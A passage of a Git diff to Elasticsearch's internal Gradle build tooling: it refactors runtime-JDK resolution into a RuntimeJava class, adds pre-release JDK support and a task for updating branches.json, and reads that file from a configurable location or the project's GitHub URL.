--- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DefaultBuildParameterExtension.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DefaultBuildParameterExtension.java @@ -28,7 +28,7 @@ public abstract class DefaultBuildParameterExtension implements BuildParameterExtension { private final Provider inFipsJvm; private final Provider runtimeJavaHome; - private final Boolean isRuntimeJavaHomeSet; + private final RuntimeJava runtimeJava; private final List javaVersions; private final JavaVersion minimumCompilerVersion; private final JavaVersion minimumRuntimeVersion; @@ -50,11 +50,8 @@ public abstract class DefaultBuildParameterExtension implements BuildParameterEx public DefaultBuildParameterExtension( ProviderFactory providers, - Provider runtimeJavaHome, + RuntimeJava runtimeJava, Provider> javaToolChainSpec, - Provider runtimeJavaVersion, - boolean isRuntimeJavaHomeSet, - Provider runtimeJavaDetails, List javaVersions, JavaVersion minimumCompilerVersion, JavaVersion minimumRuntimeVersion, @@ -68,11 +65,11 @@ public DefaultBuildParameterExtension( Provider bwcVersions ) { this.inFipsJvm = providers.systemProperty("tests.fips.enabled").map(DefaultBuildParameterExtension::parseBoolean); - this.runtimeJavaHome = cache(providers, runtimeJavaHome); + this.runtimeJava = runtimeJava; + this.runtimeJavaHome = cache(providers, runtimeJava.getJavahome()); this.javaToolChainSpec = cache(providers, javaToolChainSpec); - this.runtimeJavaVersion = cache(providers, runtimeJavaVersion); - this.isRuntimeJavaHomeSet = 
isRuntimeJavaHomeSet; - this.runtimeJavaDetails = cache(providers, runtimeJavaDetails); + this.runtimeJavaVersion = cache(providers, runtimeJava.getJavaVersion()); + this.runtimeJavaDetails = cache(providers, runtimeJava.getVendorDetails()); this.javaVersions = javaVersions; this.minimumCompilerVersion = minimumCompilerVersion; this.minimumRuntimeVersion = minimumRuntimeVersion; @@ -116,7 +113,12 @@ public void withFipsEnabledOnly(Task task) { @Override public Boolean getIsRuntimeJavaHomeSet() { - return isRuntimeJavaHomeSet; + return runtimeJava.isExplicitlySet(); + } + + @Override + public RuntimeJava getRuntimeJava() { + return runtimeJava; } @Override diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DevelopmentBranch.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DevelopmentBranch.java new file mode 100644 index 0000000000000..964db5eabd4b7 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DevelopmentBranch.java @@ -0,0 +1,28 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.info; + +import org.elasticsearch.gradle.Version; + +import java.io.Serializable; +import java.util.Objects; + +/** + * Information about a development branch used in branches.json file + * + * @param name Name of the development branch + * @param version Elasticsearch version on the development branch + */ +public record DevelopmentBranch(String name, Version version) implements Serializable { + public DevelopmentBranch { + Objects.requireNonNull(name); + Objects.requireNonNull(version); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPlugin.java index 675f1198b2a7d..fba659a39982d 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPlugin.java @@ -8,13 +8,17 @@ */ package org.elasticsearch.gradle.internal.info; -import com.fasterxml.jackson.databind.JsonNode; import com.fasterxml.jackson.databind.ObjectMapper; import org.apache.commons.io.IOUtils; -import org.elasticsearch.gradle.VersionProperties; +import org.elasticsearch.gradle.Architecture; +import org.elasticsearch.gradle.OS; +import org.elasticsearch.gradle.Version; import org.elasticsearch.gradle.internal.BwcVersions; +import org.elasticsearch.gradle.internal.Jdk; +import org.elasticsearch.gradle.internal.JdkDownloadPlugin; import org.elasticsearch.gradle.internal.conventions.GitInfoPlugin; +import org.elasticsearch.gradle.internal.conventions.VersionPropertiesPlugin; import org.elasticsearch.gradle.internal.conventions.info.GitInfo; import org.elasticsearch.gradle.internal.conventions.info.ParallelDetector; import org.elasticsearch.gradle.internal.conventions.util.Util; @@ -22,6 +26,7 @@ import org.gradle.api.Action; import org.gradle.api.GradleException; import 
org.gradle.api.JavaVersion; +import org.gradle.api.NamedDomainObjectContainer; import org.gradle.api.Plugin; import org.gradle.api.Project; import org.gradle.api.logging.Logger; @@ -42,7 +47,6 @@ import org.gradle.jvm.toolchain.JvmVendorSpec; import org.gradle.jvm.toolchain.internal.InstallationLocation; import org.gradle.util.GradleVersion; -import org.jetbrains.annotations.NotNull; import java.io.BufferedReader; import java.io.File; @@ -51,28 +55,39 @@ import java.io.InputStream; import java.io.InputStreamReader; import java.io.UncheckedIOException; +import java.net.URI; import java.nio.file.Files; -import java.util.ArrayList; import java.util.List; import java.util.Locale; +import java.util.Properties; import java.util.Random; import java.util.concurrent.atomic.AtomicReference; +import java.util.regex.Matcher; +import java.util.regex.Pattern; import java.util.stream.Collectors; import java.util.stream.Stream; import javax.inject.Inject; import static org.elasticsearch.gradle.internal.conventions.GUtils.elvis; +import static org.elasticsearch.gradle.internal.conventions.VersionPropertiesPlugin.VERSIONS_EXT; +import static org.elasticsearch.gradle.internal.toolchain.EarlyAccessCatalogJdkToolchainResolver.findLatestPreReleaseBuild; +import static org.elasticsearch.gradle.internal.toolchain.EarlyAccessCatalogJdkToolchainResolver.findPreReleaseBuild; public class GlobalBuildInfoPlugin implements Plugin { private static final Logger LOGGER = Logging.getLogger(GlobalBuildInfoPlugin.class); private static final String DEFAULT_VERSION_JAVA_FILE_PATH = "server/src/main/java/org/elasticsearch/Version.java"; + private static final String DEFAULT_BRANCHES_FILE_URL = "https://raw.githubusercontent.com/elastic/elasticsearch/main/branches.json"; + private static final String BRANCHES_FILE_LOCATION_PROPERTY = "org.elasticsearch.build.branches-file-location"; + private static final Pattern LINE_PATTERN = Pattern.compile( + "\\W+public static final Version V_(\\d+)_(\\d+)_(\\d+)(_alpha\\d+|_beta\\d+|_rc\\d+)?.*\\);" + ); private ObjectFactory objectFactory; private final JavaInstallationRegistry javaInstallationRegistry; private final JvmMetadataDetector metadataDetector; private final ProviderFactory providers; - private final ObjectMapper objectMapper; + private final BranchesFileParser branchesFileParser; private JavaToolchainService toolChainService; private Project project; @@ -87,7 +102,7 @@ public GlobalBuildInfoPlugin( this.javaInstallationRegistry = javaInstallationRegistry; this.metadataDetector = new ErrorTraceMetadataDetector(metadataDetector); this.providers = providers; - this.objectMapper = new ObjectMapper(); + this.branchesFileParser = new BranchesFileParser(new ObjectMapper()); } @Override @@ -97,6 +112,7 @@ public void apply(Project project) { } this.project = project; project.getPlugins().apply(JvmToolchainsPlugin.class); + project.getPlugins().apply(JdkDownloadPlugin.class); Provider gitInfo = project.getPlugins().apply(GitInfoPlugin.class).getGitInfo(); toolChainService = project.getExtensions().getByType(JavaToolchainService.class); @@ -105,41 +121,27 @@ public void apply(Project project) { throw new GradleException("Gradle " + minimumGradleVersion.getVersion() + "+ is required"); } - JavaVersion minimumCompilerVersion = JavaVersion.toVersion(getResourceContents("/minimumCompilerVersion")); - JavaVersion minimumRuntimeVersion = JavaVersion.toVersion(getResourceContents("/minimumRuntimeVersion")); + project.getPlugins().apply(VersionPropertiesPlugin.class); + Properties 
versionProperties = (Properties) project.getExtensions().getByName(VERSIONS_EXT); + JavaVersion minimumCompilerVersion = JavaVersion.toVersion(versionProperties.get("minimumCompilerJava")); + JavaVersion minimumRuntimeVersion = JavaVersion.toVersion(versionProperties.get("minimumRuntimeJava")); - Provider explicitRuntimeJavaHome = findRuntimeJavaHome(); - boolean isRuntimeJavaHomeExplicitlySet = explicitRuntimeJavaHome.isPresent(); - Provider actualRuntimeJavaHome = isRuntimeJavaHomeExplicitlySet - ? explicitRuntimeJavaHome - : resolveJavaHomeFromToolChainService(VersionProperties.getBundledJdkMajorVersion()); + Version elasticsearchVersionProperty = Version.fromString(versionProperties.getProperty("elasticsearch")); - Provider runtimeJdkMetaData = actualRuntimeJavaHome.map( - runtimeJavaHome -> metadataDetector.getMetadata(getJavaInstallation(runtimeJavaHome)) - ); + RuntimeJava runtimeJavaHome = findRuntimeJavaHome(); AtomicReference cache = new AtomicReference<>(); Provider bwcVersionsProvider = providers.provider( - () -> cache.updateAndGet(val -> val == null ? resolveBwcVersions() : val) + () -> cache.updateAndGet(val -> val == null ? resolveBwcVersions(elasticsearchVersionProperty) : val) ); + BuildParameterExtension buildParams = project.getExtensions() .create( BuildParameterExtension.class, BuildParameterExtension.EXTENSION_NAME, DefaultBuildParameterExtension.class, providers, - actualRuntimeJavaHome, + runtimeJavaHome, resolveToolchainSpecFromEnv(), - actualRuntimeJavaHome.map( - javaHome -> determineJavaVersion( - "runtime java.home", - javaHome, - isRuntimeJavaHomeExplicitlySet - ? minimumRuntimeVersion - : JavaVersion.toVersion(VersionProperties.getBundledJdkMajorVersion()) - ) - ), - isRuntimeJavaHomeExplicitlySet, - runtimeJdkMetaData.map(m -> formatJavaVendorDetails(m)), getAvailableJavaVersions(), minimumCompilerVersion, minimumRuntimeVersion, @@ -189,32 +191,49 @@ private String formatJavaVendorDetails(JvmInstallationMetadata runtimeJdkMetaDat /* Introspect all versions of ES that may be tested against for backwards * compatibility. It is *super* important that this logic is the same as the * logic in VersionUtils.java. 
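* For illustration (using the versions that appear elsewhere in this changeset, plus a hypothetical
* 9.2.0 on main): with the current version at 9.1.4 and branches.json listing main (9.2.0),
* 9.1 (9.1.4), 9.0 (9.0.7), 8.19 (8.19.4) and 8.18 (8.18.7), computeUnreleased maps 9.0.7 to
* :distribution:bwc:minor1 (same major), 8.19.4 and 8.18.7 to :distribution:bwc:major1 and
* :distribution:bwc:major2 (previous major), and 9.1.4 itself to :distribution; main is newer than
* the current version, and anything older than one major back is ignored.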
*/ - private BwcVersions resolveBwcVersions() { + private BwcVersions resolveBwcVersions(Version currentElasticsearchVersion) { String versionsFilePath = elvis( System.getProperty("BWC_VERSION_SOURCE"), new File(Util.locateElasticsearchWorkspace(project.getGradle()), DEFAULT_VERSION_JAVA_FILE_PATH).getPath() ); try (var is = new FileInputStream(versionsFilePath)) { List<String> versionLines = IOUtils.readLines(is, "UTF-8"); - return new BwcVersions(versionLines, getDevelopmentBranches()); + return new BwcVersions(currentElasticsearchVersion, parseVersionLines(versionLines), getDevelopmentBranches()); } catch (IOException e) { throw new IllegalStateException("Unable to resolve bwc versions from versionsFile.", e); } } - private List<String> getDevelopmentBranches() { - List<String> branches = new ArrayList<>(); - File branchesFile = new File(Util.locateElasticsearchWorkspace(project.getGradle()), "branches.json"); - try (InputStream is = new FileInputStream(branchesFile)) { - JsonNode json = objectMapper.readTree(is); - for (JsonNode node : json.get("branches")) { - branches.add(node.get("branch").asText()); + private List<Version> parseVersionLines(List<String> versionLines) { + return versionLines.stream() + .map(LINE_PATTERN::matcher) + .filter(Matcher::matches) + .map(match -> new Version(Integer.parseInt(match.group(1)), Integer.parseInt(match.group(2)), Integer.parseInt(match.group(3)))) + .sorted() + .toList(); + } + + private List<DevelopmentBranch> getDevelopmentBranches() { + String branchesFileLocation = project.getProviders() + .gradleProperty(BRANCHES_FILE_LOCATION_PROPERTY) + .getOrElse(DEFAULT_BRANCHES_FILE_URL); + LOGGER.info("Reading branches.json from {}", branchesFileLocation); + byte[] branchesBytes; + if (branchesFileLocation.startsWith("http")) { + try (InputStream in = URI.create(branchesFileLocation).toURL().openStream()) { + branchesBytes = in.readAllBytes(); + } catch (IOException e) { + throw new UncheckedIOException("Failed to download branches.json from: " + branchesFileLocation, e); + } + } else { + try { + branchesBytes = Files.readAllBytes(new File(branchesFileLocation).toPath()); + } catch (IOException e) { + throw new UncheckedIOException("Failed to read branches.json from: " + branchesFileLocation, e); } - } catch (IOException e) { - throw new UncheckedIOException(e); } - return branches; + return branchesFileParser.parse(branchesBytes); } private void logGlobalBuildInfo(BuildParameterExtension buildParams) { @@ -229,7 +248,7 @@ private void logGlobalBuildInfo(BuildParameterExtension buildParams) { LOGGER.quiet("Elasticsearch Build Hamster says Hello!"); LOGGER.quiet(" Gradle Version : " + GradleVersion.current().getVersion()); LOGGER.quiet(" OS Info : " + osName + " " + osVersion + " (" + osArch + ")"); - if (buildParams.getIsRuntimeJavaHomeSet()) { + if (buildParams.getRuntimeJava().isExplicitlySet()) { JvmInstallationMetadata runtimeJvm = metadataDetector.getMetadata(getJavaInstallation(buildParams.getRuntimeJavaHome().get())); final String runtimeJvmVendorDetails = runtimeJvm.getVendor().getDisplayName(); final String runtimeJvmImplementationVersion = runtimeJvm.getJvmVersion(); @@ -270,7 +289,9 @@ private JavaVersion determineJavaVersion(String description, File javaHome, Java private InstallationLocation getJavaInstallation(File javaHome) { return getAvailableJavaInstallationLocationSteam().filter(installationLocation -> isSameFile(javaHome, installationLocation)) .findFirst() - .orElseThrow(() -> new GradleException("Could not locate available Java installation in Gradle registry at: " + 
javaHome)); + .orElse( + InstallationLocation.userDefined(javaHome, "Manually resolved JavaHome (not auto-detected by Gradle toolchain service)") + ); } private boolean isSameFile(File javaHome, InstallationLocation installationLocation) { @@ -334,26 +355,80 @@ private static void assertMinimumCompilerVersion(JavaVersion minimumCompilerVers } } - private Provider findRuntimeJavaHome() { - String runtimeJavaProperty = System.getProperty("runtime.java"); + private RuntimeJava findRuntimeJavaHome() { + Properties versionProperties = (Properties) project.getExtensions().getByName(VERSIONS_EXT); + String bundledJdkVersion = versionProperties.getProperty("bundled_jdk"); + String bundledJdkMajorVersion = bundledJdkVersion.split("[.+]")[0]; + String runtimeJavaProperty = System.getProperty("runtime.java"); if (runtimeJavaProperty != null) { - return resolveJavaHomeFromToolChainService(runtimeJavaProperty); + if (runtimeJavaProperty.toLowerCase().endsWith("-pre")) { + // handle pre-release builds differently due to lack of support in Gradle toolchain service + // we resolve them using JdkDownloadPlugin for now. + return resolvePreReleaseRuntimeJavaHome(runtimeJavaProperty, bundledJdkMajorVersion); + } else { + return runtimeJavaHome(resolveJavaHomeFromToolChainService(runtimeJavaProperty), true, bundledJdkMajorVersion); + } } if (System.getenv("RUNTIME_JAVA_HOME") != null) { - return providers.provider(() -> new File(System.getenv("RUNTIME_JAVA_HOME"))); + return runtimeJavaHome(providers.provider(() -> new File(System.getenv("RUNTIME_JAVA_HOME"))), true, bundledJdkVersion); } // fall back to tool chain if set. String env = System.getenv("JAVA_TOOLCHAIN_HOME"); - return providers.provider(() -> { - if (env == null) { - return null; - } - return new File(env); + boolean explicitlySet = env != null; + Provider javaHome = explicitlySet + ? providers.provider(() -> new File(env)) + : resolveJavaHomeFromToolChainService(bundledJdkMajorVersion); + return runtimeJavaHome(javaHome, explicitlySet, bundledJdkMajorVersion); + } + + private RuntimeJava runtimeJavaHome(Provider fileProvider, boolean explicitlySet, String bundledJdkMajorVersion) { + return runtimeJavaHome(fileProvider, explicitlySet, null, null, bundledJdkMajorVersion); + } + + private RuntimeJava runtimeJavaHome( + Provider fileProvider, + boolean explicitlySet, + String preReleasePostfix, + Integer buildNumber, + String bundledJdkMajorVersion + ) { + Provider javaVersion = fileProvider.map( + javaHome -> determineJavaVersion( + "runtime java.home", + javaHome, + fileProvider.isPresent() + ? JavaVersion.toVersion(getResourceContents("/minimumRuntimeVersion")) + : JavaVersion.toVersion(bundledJdkMajorVersion) + ) + ); + + Provider vendorDetails = fileProvider.map(j -> metadataDetector.getMetadata(getJavaInstallation(j))) + .map(m -> formatJavaVendorDetails(m)); + + return new RuntimeJava(fileProvider, javaVersion, vendorDetails, explicitlySet, preReleasePostfix, buildNumber); + } + + private RuntimeJava resolvePreReleaseRuntimeJavaHome(String runtimeJavaProperty, String bundledJdkMajorVersion) { + var major = JavaLanguageVersion.of(Integer.parseInt(runtimeJavaProperty.substring(0, runtimeJavaProperty.length() - 4))); + Integer buildNumber = Integer.getInteger("runtime.java.build"); + var jdkbuild = buildNumber == null ? 
findLatestPreReleaseBuild(major) : findPreReleaseBuild(major, buildNumber); + String preReleaseType = jdkbuild.type(); + String prVersionString = String.format("%d-%s+%d", major.asInt(), preReleaseType, jdkbuild.buildNumber()); + NamedDomainObjectContainer container = (NamedDomainObjectContainer) project.getExtensions().getByName("jdks"); + Jdk jdk = container.create(preReleaseType + "_" + major.asInt(), j -> { + j.setVersion(prVersionString); + j.setVendor("openjdk"); + j.setPlatform(OS.current().javaOsReference); + j.setArchitecture(Architecture.current().javaClassifier); + j.setDistributionVersion(preReleaseType); }); + // We on purpose resolve this here eagerly to ensure we resolve the jdk configuration in the context of the root project. + // If we keep this lazy we can not guarantee in which project context this is resolved which will fail the build. + File file = new File(jdk.getJavaHomePath().toString()); + return runtimeJavaHome(providers.provider(() -> file), true, preReleaseType, jdkbuild.buildNumber(), bundledJdkMajorVersion); } - @NotNull private Provider resolveJavaHomeFromToolChainService(String version) { Property value = objectFactory.property(JavaLanguageVersion.class).value(JavaLanguageVersion.of(version)); return toolChainService.launcherFor(javaToolchainSpec -> javaToolchainSpec.getLanguageVersion().value(value)) @@ -410,4 +485,5 @@ public void execute(JavaToolchainSpec spec) { spec.getLanguageVersion().set(expectedJavaLanguageVersion); } } + } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/RuntimeJava.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/RuntimeJava.java new file mode 100644 index 0000000000000..7935d87256f89 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/RuntimeJava.java @@ -0,0 +1,73 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */ + +package org.elasticsearch.gradle.internal.info; + +import org.gradle.api.JavaVersion; +import org.gradle.api.provider.Provider; + +import java.io.File; + +public class RuntimeJava { + + private final Provider javahome; + private final Provider javaVersion; + private final boolean explicitlySet; + private final String preReleaseType; + private final Provider vendorDetails; + private final Integer buildNumber; + + RuntimeJava(Provider javahome, Provider javaVersion, Provider vendorDetails, boolean explicitlySet) { + this(javahome, javaVersion, vendorDetails, explicitlySet, null, null); + } + + RuntimeJava( + Provider javahome, + Provider javaVersion, + Provider vendorDetails, + boolean explicitlySet, + String preReleaseType, + Integer buildNumber + ) { + this.javahome = javahome; + this.javaVersion = javaVersion; + this.vendorDetails = vendorDetails; + this.explicitlySet = explicitlySet; + this.preReleaseType = preReleaseType; + this.buildNumber = buildNumber; + } + + public Provider getJavahome() { + return javahome; + } + + public boolean isPreRelease() { + return preReleaseType != null; + } + + public Provider getJavaVersion() { + return javaVersion; + } + + public Provider getVendorDetails() { + return vendorDetails; + } + + public boolean isExplicitlySet() { + return explicitlySet; + } + + public String getPreReleaseType() { + return preReleaseType; + } + + public Integer getBuildNumber() { + return buildNumber; + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/precommit/ThirdPartyAuditTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/precommit/ThirdPartyAuditTask.java index 1acdc794ee0d2..c60feab80fcf3 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/precommit/ThirdPartyAuditTask.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/precommit/ThirdPartyAuditTask.java @@ -61,6 +61,8 @@ import static org.gradle.api.JavaVersion.VERSION_22; import static org.gradle.api.JavaVersion.VERSION_23; import static org.gradle.api.JavaVersion.VERSION_24; +import static org.gradle.api.JavaVersion.VERSION_25; +import static org.gradle.api.JavaVersion.VERSION_26; @CacheableTask public abstract class ThirdPartyAuditTask extends DefaultTask { @@ -342,12 +344,14 @@ private String runForbiddenAPIsCli() throws IOException { spec.setExecutable(javaHome.get() + "/bin/java"); } spec.classpath(getForbiddenAPIsClasspath(), getThirdPartyClasspath()); - // Enable explicitly for each release as appropriate. Just JDK 20/21/22/23/24 for now, and just the vector module. + // Enable explicitly for each release as appropriate and just the vector module. 
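+ // The incubating vector module is not resolved by default, so each newly vetted JDK release has to be
+ // opted in here before the forbidden-APIs scan can resolve jdk.incubator.vector types.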
if (isJavaVersion(VERSION_20) || isJavaVersion(VERSION_21) || isJavaVersion(VERSION_22) || isJavaVersion(VERSION_23) - || isJavaVersion(VERSION_24)) { + || isJavaVersion(VERSION_24) + || isJavaVersion(VERSION_25) + || isJavaVersion(VERSION_26)) { spec.jvmArgs("--add-modules", "jdk.incubator.vector"); } spec.jvmArgs("-Xmx1g"); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/ReleaseToolsPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/ReleaseToolsPlugin.java index fce8b0c545dbb..f0fb0073d4350 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/ReleaseToolsPlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/ReleaseToolsPlugin.java @@ -53,6 +53,7 @@ public void apply(Project project) { project.getTasks().register("extractCurrentVersions", ExtractCurrentVersionsTask.class); project.getTasks().register("tagVersions", TagVersionsTask.class); project.getTasks().register("setCompatibleVersions", SetCompatibleVersionsTask.class, t -> t.setThisVersion(version)); + project.getTasks().register("updateBranchesJson", UpdateBranchesJsonTask.class); final Directory changeLogDirectory = projectDirectory.dir("docs/changelog"); final Directory changeLogBundlesDirectory = projectDirectory.dir("docs/release-notes/changelog-bundles"); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/UpdateBranchesJsonTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/UpdateBranchesJsonTask.java new file mode 100644 index 0000000000000..584bfc07693e2 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/UpdateBranchesJsonTask.java @@ -0,0 +1,176 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */
+
+package org.elasticsearch.gradle.internal.release;
+
+import com.fasterxml.jackson.core.util.DefaultIndenter;
+import com.fasterxml.jackson.core.util.DefaultPrettyPrinter;
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.fasterxml.jackson.databind.node.ArrayNode;
+import com.fasterxml.jackson.databind.node.ObjectNode;
+
+import org.elasticsearch.gradle.Version;
+import org.elasticsearch.gradle.internal.info.BranchesFileParser;
+import org.elasticsearch.gradle.internal.info.DevelopmentBranch;
+import org.gradle.api.DefaultTask;
+import org.gradle.api.InvalidUserDataException;
+import org.gradle.api.file.ProjectLayout;
+import org.gradle.api.logging.Logger;
+import org.gradle.api.logging.Logging;
+import org.gradle.api.tasks.Input;
+import org.gradle.api.tasks.Optional;
+import org.gradle.api.tasks.OutputFile;
+import org.gradle.api.tasks.TaskAction;
+import org.gradle.api.tasks.options.Option;
+
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.IOException;
+import java.io.UncheckedIOException;
+import java.nio.file.Files;
+import java.util.Comparator;
+import java.util.List;
+
+import javax.inject.Inject;
+
+/**
+ * Updates the branches.json file in the root of the repository.
+ */
+public class UpdateBranchesJsonTask extends DefaultTask {
+
+    private static final Logger LOGGER = Logging.getLogger(UpdateBranchesJsonTask.class);
+
+    private final ObjectMapper objectMapper;
+    private final BranchesFileParser branchesFileParser;
+
+    @OutputFile
+    private File branchesFile;
+
+    @Input
+    @Optional
+    private DevelopmentBranch addBranch;
+    @Input
+    @Optional
+    private String removeBranch;
+    @Input
+    @Optional
+    private DevelopmentBranch updateBranch;
+
+    @Inject
+    public UpdateBranchesJsonTask(ProjectLayout projectLayout) {
+        this.objectMapper = new ObjectMapper();
+        this.branchesFileParser = new BranchesFileParser(objectMapper);
+        this.branchesFile = projectLayout.getSettingsDirectory().file("branches.json").getAsFile();
+    }
+
+    public File getBranchesFile() {
+        return branchesFile;
+    }
+
+    public void setBranchesFile(File branchesFile) {
+        this.branchesFile = branchesFile;
+    }
+
+    public DevelopmentBranch getAddBranch() {
+        return addBranch;
+    }
+
+    public String getRemoveBranch() {
+        return removeBranch;
+    }
+
+    public DevelopmentBranch getUpdateBranch() {
+        return updateBranch;
+    }
+
+    @Option(option = "add-branch", description = "Specifies the branch and corresponding version to add in format <branch>:<version>")
+    public void addBranch(String branchAndVersion) {
+        this.addBranch = toDevelopmentBranch(branchAndVersion);
+    }
+
+    @Option(option = "remove-branch", description = "Specifies the branch to remove")
+    public void removeBranch(String branch) {
+        this.removeBranch = branch;
+    }
+
+    @Option(option = "update-branch", description = "Specifies the branch and corresponding version to update in format <branch>:<version>")
+    public void updateBranch(String branchAndVersion) {
+        this.updateBranch = toDevelopmentBranch(branchAndVersion);
+    }
+
+    private DevelopmentBranch toDevelopmentBranch(String branchAndVersion) {
+        String[] parts = branchAndVersion.split(":");
+        if (parts.length != 2) {
+            throw new InvalidUserDataException("Expected branch and version in format <branch>:<version>");
+        }
+        return new DevelopmentBranch(parts[0], Version.fromString(parts[1]));
+    }
+
+    @TaskAction
+    public void executeTask() throws IOException {
+        List<DevelopmentBranch> developmentBranches = readBranches(branchesFile);
+
+        if (addBranch == null && removeBranch == null && updateBranch ==
null) { + throw new InvalidUserDataException("At least one of add-branch, remove-branch or update-branch must be specified"); + } + + if (addBranch != null) { + LOGGER.info("Adding branch {} with version {}", addBranch.name(), addBranch.version()); + if (developmentBranches.stream().anyMatch(developmentBranch -> developmentBranch.name().equals(addBranch.name()))) { + throw new InvalidUserDataException("Branch " + addBranch.name() + " already exists"); + } + developmentBranches.add(addBranch); + } + if (removeBranch != null) { + LOGGER.info("Removing branch {}", removeBranch); + if (developmentBranches.stream().noneMatch(developmentBranch -> developmentBranch.name().equals(removeBranch))) { + throw new InvalidUserDataException("Branch " + removeBranch + " does not exist"); + } + developmentBranches.removeIf(developmentBranch -> developmentBranch.name().equals(removeBranch)); + } + if (updateBranch != null) { + LOGGER.info("Updating branch {} with version {}", updateBranch.name(), updateBranch.version()); + if (developmentBranches.stream().noneMatch(developmentBranch -> developmentBranch.name().equals(updateBranch.name()))) { + throw new InvalidUserDataException("Branch " + updateBranch.name() + " does not exist"); + } + developmentBranches.removeIf(developmentBranch -> developmentBranch.name().equals(updateBranch.name())); + developmentBranches.add(updateBranch); + } + + developmentBranches.sort(Comparator.comparing(DevelopmentBranch::version).reversed()); + + JsonNode jsonNode = objectMapper.readTree(new FileInputStream(branchesFile)); + ArrayNode updatedBranches = objectMapper.createArrayNode(); + for (DevelopmentBranch branch : developmentBranches) { + ObjectNode objectNode = objectMapper.createObjectNode(); + objectNode.put("branch", branch.name()); + objectNode.put("version", branch.version().toString()); + updatedBranches.add(objectNode); + } + ((ObjectNode) jsonNode).replace("branches", updatedBranches); + + DefaultPrettyPrinter prettyPrinter = new DefaultPrettyPrinter(); + prettyPrinter.indentArraysWith(new DefaultIndenter(" ", DefaultIndenter.SYS_LF)); + objectMapper.writer(prettyPrinter).writeValue(branchesFile, jsonNode); + } + + private List readBranches(File branchesFile) { + if (branchesFile.isFile() == false) { + throw new InvalidUserDataException("File branches.json has not been found in " + branchesFile.getAbsolutePath()); + } + + try { + byte[] branchesBytes = Files.readAllBytes(branchesFile.toPath()); + return branchesFileParser.parse(branchesBytes); + } catch (IOException e) { + throw new UncheckedIOException("Failed to read branches.json from " + branchesFile.getPath(), e); + } + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/shadow/XmlClassRelocationTransformer.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/shadow/XmlClassRelocationTransformer.java index 57afa7014240b..83af018c0924f 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/shadow/XmlClassRelocationTransformer.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/shadow/XmlClassRelocationTransformer.java @@ -9,10 +9,9 @@ package org.elasticsearch.gradle.internal.shadow; -import com.github.jengelman.gradle.plugins.shadow.ShadowStats; import com.github.jengelman.gradle.plugins.shadow.relocation.RelocateClassContext; import com.github.jengelman.gradle.plugins.shadow.relocation.Relocator; -import com.github.jengelman.gradle.plugins.shadow.transformers.Transformer; +import 
com.github.jengelman.gradle.plugins.shadow.transformers.ResourceTransformer; import com.github.jengelman.gradle.plugins.shadow.transformers.TransformerContext; import org.apache.commons.io.IOUtils; @@ -26,7 +25,7 @@ import java.io.BufferedInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; -import java.util.List; +import java.util.Set; import javax.xml.parsers.DocumentBuilder; import javax.xml.parsers.DocumentBuilderFactory; @@ -35,7 +34,7 @@ import javax.xml.transform.dom.DOMSource; import javax.xml.transform.stream.StreamResult; -public class XmlClassRelocationTransformer implements Transformer { +public class XmlClassRelocationTransformer implements ResourceTransformer { boolean hasTransformedResource = false; @@ -55,7 +54,7 @@ public boolean canTransformResource(FileTreeElement element) { @Override public void transform(TransformerContext context) { try { - BufferedInputStream bis = new BufferedInputStream(context.getIs()); + BufferedInputStream bis = new BufferedInputStream(context.getInputStream()); DocumentBuilderFactory dbFactory = 